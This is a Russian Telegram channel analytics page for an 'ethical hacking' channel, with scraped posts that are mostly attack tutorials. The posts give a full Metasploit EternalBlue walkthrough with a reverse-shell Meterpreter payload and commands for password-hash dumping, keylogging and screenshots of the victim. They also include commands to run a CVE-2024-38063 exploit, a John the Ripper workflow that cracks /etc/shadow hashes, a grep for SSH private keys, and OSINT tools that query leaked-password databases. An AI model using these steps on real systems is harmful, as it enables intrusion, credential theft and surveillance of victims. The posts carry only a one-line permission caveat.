CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Больше📈 Аналитический обзор Telegram-канала CodeGuard: PySec Edition
Канал CodeGuard: PySec Edition является активным участником. Сейчас сообщество объединяет 14 026 подписчиков, занимая 8 813 место в категории Технологии и приложения и 46 152 место в регионе Россия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 026 подписчиков.
Согласно последним данным от 23 сентября, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 734, а за последние 24 часа — 21, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 10.45%. В первые 24 часа после публикации контент обычно набирает 5.49% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 1 466 просмотров. В течение первых суток публикация набирает 770 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 8.
- Тематические интересы: Контент сосредоточен на ключевых темах, таких как codeguard, pysec, docker, grep, контейнер.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Благодаря высокой частоте обновлений (последние данные получены 24 сентября, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
sudo msfconsole
2. Поиск модуля для EternalBlue (MS17-010):
search ms17-0103. Используем модуль:
use exploit/windows/smb/ms17_010_eternalblue4. Настройка (IP цели и своя слушающая машина):
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
5. Атака:
run6. Получили Meterpreter shell:
sysinfo getuid shellПолезные команды внутри Meterpreter:
hashdump — вытащить хеши паролей
screenshot — скриншот экрана жертвы
keyscan_start / keyscan_dump — кейлоггер
upload /file /путь — загрузить файл
⚠️ Только на своих системах или с разрешения.
😈 CodeGuard: PySec Edition | Чат👉Оцените покрытие вашей защиты (синие команды) 👉Спланируйте, какие техники использовать в Red Team 👉Экспортируйте/импортируйте слой в JSONДля кого: Синих команд (проверить детекцию техник), красных команд (спланировать маршрут атаки), аналитиков угроз. Почему удобно: Можно добавить скоринг, комментарии и цвета для каждой техники. 😈 CodeGuard: PySec Edition | Чат
git clone https://github.comAvidan1/CVE-2024-38063
python3 CVE-2024-38063.py
Что искать в логах: BSOD stop code 0x00000001 в tcpip.sys
Фикс: Поставить патч от Microsoft (август 2024) или отключить IPv6 .
Почему страшно: Это zero-click — вам даже не надо открывать письмо или переходить по ссылке. Достаточно получить IPv6-пакет по сети
😈 CodeGuard: PySec Edition | Чат🔵Ищет по 300+ сайтам (соцсети, GitHub, форумы) 🔵Проверяет 900k утекших паролей через HudsonRock API 🔵Ищет по ProxyNova (3.2 млрд записей) и BreachDirectory (18 млрд) 🔵Пытается взломать пароли через WeakpassУстановка:
git clone https://github.com/ibnaleem/gosearch cd gosearch go buildЗапуск:
./gosearch -u username --no-false-positives
Фишка против Sherlock: Цветовая индикация — жёлтые результаты под вопросом, зелёные — 100% попадание
😈 CodeGuard: PySec Edition | Чат🔵Massive Online Open Courses — Computer Security от Stanford, криптография, хардверная безопасность 🔵Academic Courses — NYU Tandon Hack Night, Offensive Computer Security от FSU, Exploitation от RPI 🔵Laboratories — практические стенды 🔵CTF — площадки для тренировок 🔵SecurityTube Playlists — видео-лекцииКому зайдёт: Новичкам и профессионалам, которые хотят систематизировать знания. 😈 CodeGuard: PySec Edition | Чат
lsof -p [PID]2. Какой процесс слушает порт:
lsof -i :80
3. Все сетевые соединения:
lsof -i -P -n
4. Кто открыл файл (и удалил, но не закрыл):
lsof /path/to/file5. Открытые файлы пользователя:
lsof -u username6. Все процессы, которые используют папку (даже если она удалена):
lsof +D /path/to/folder7. Найти свой SSH-ключ в памяти процессов:
lsof | grep "id_rsa"
8. Сетевые соединения с деталями процессов:
lsof -i -n -P | grep ESTABLISHED
Сохраняйте 🔖
😈 CodeGuard: PySec Edition | Чат🔵Автоматическое сканирование портов и сервисов 🔵Поиск уязвимостей через базу CVE 🔵Генерация отчётов 🔵Легко развернуть в DockerУстановка:
git clone https://github.com/GoVanguard/legion.git
cd legion
sudo ./start-legion.sh
😈 CodeGuard: PySec Edition | Чат/dev и получаем доступ к веб-шеллу phpbash .
⚫️Повышение привилегий: Находим пользователя scriptmanager, который может выполнять всё без пароля (sudo -l) .
⚫️Результат: Модифицируем Python-скрипт, который запускается от имени root по расписанию, и получаем полный контроль над системой .
Для кого: Идеально для новичков и тех, кто готовится к сертификации OSCP.
😈 CodeGuard: PySec Edition | Чат🔵Не нужно ничего устанавливать 🔵Есть бесплатные лимиты 🔵Интеграция с APIДля кого: Новичкам и тем, у кого нет доступа к мощному железу. 🎁 Бонусный инструмент: Проверка заголовков безопасности — покажет, какие заголовки (CSP, HSTS, X-Frame-Options) отсутствуют на сайте. 😈 CodeGuard: PySec Edition | Чат
sudo apt install john
2. Извлечение хешей (Linux shadow):
unshadow /etc/passwd /etc/shadow > hashes.txt
3. Словарная атака:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
4. Атака по маске (8 цифр):
john --mask=?d?d?d?d?d?d?d?d hashes.txt
5. Показать подобранные пароли:
john --show hashes.txt
6. Атака на NTLM-хеш Windows:
john --format=nt hash.txt --wordlist=rockyou.txt
⚠️ Только на своих системах или с разрешения.
😈 CodeGuard: PySec Edition | Чатgithub.com/smicallef/spiderfoot)
Установка:
git clone https://github.com/smicallef/spiderfoot
cd spiderfoot
pip install -r requirements.txt
python3 sf.py
Открыть http://localhost:5001
Что умеет:
🔵Whois, DNS, поддомены 🔵Поиск email, соцсетей, GitHub 🔵Проверка утечек (HaveIBeenPwned) 🔵Интеграция с Shodan, VirusTotal🔥 Кейс: OSINT-специалист сканировал домен компании и нашёл поддомен
backup.old.company.com с открытым FTP-доступом и дампом БД. Атака через забытый поддомен — один из самых частых векторов.
💡 Совет: Запускайте через VPN.
😈 CodeGuard: PySec Edition | Чат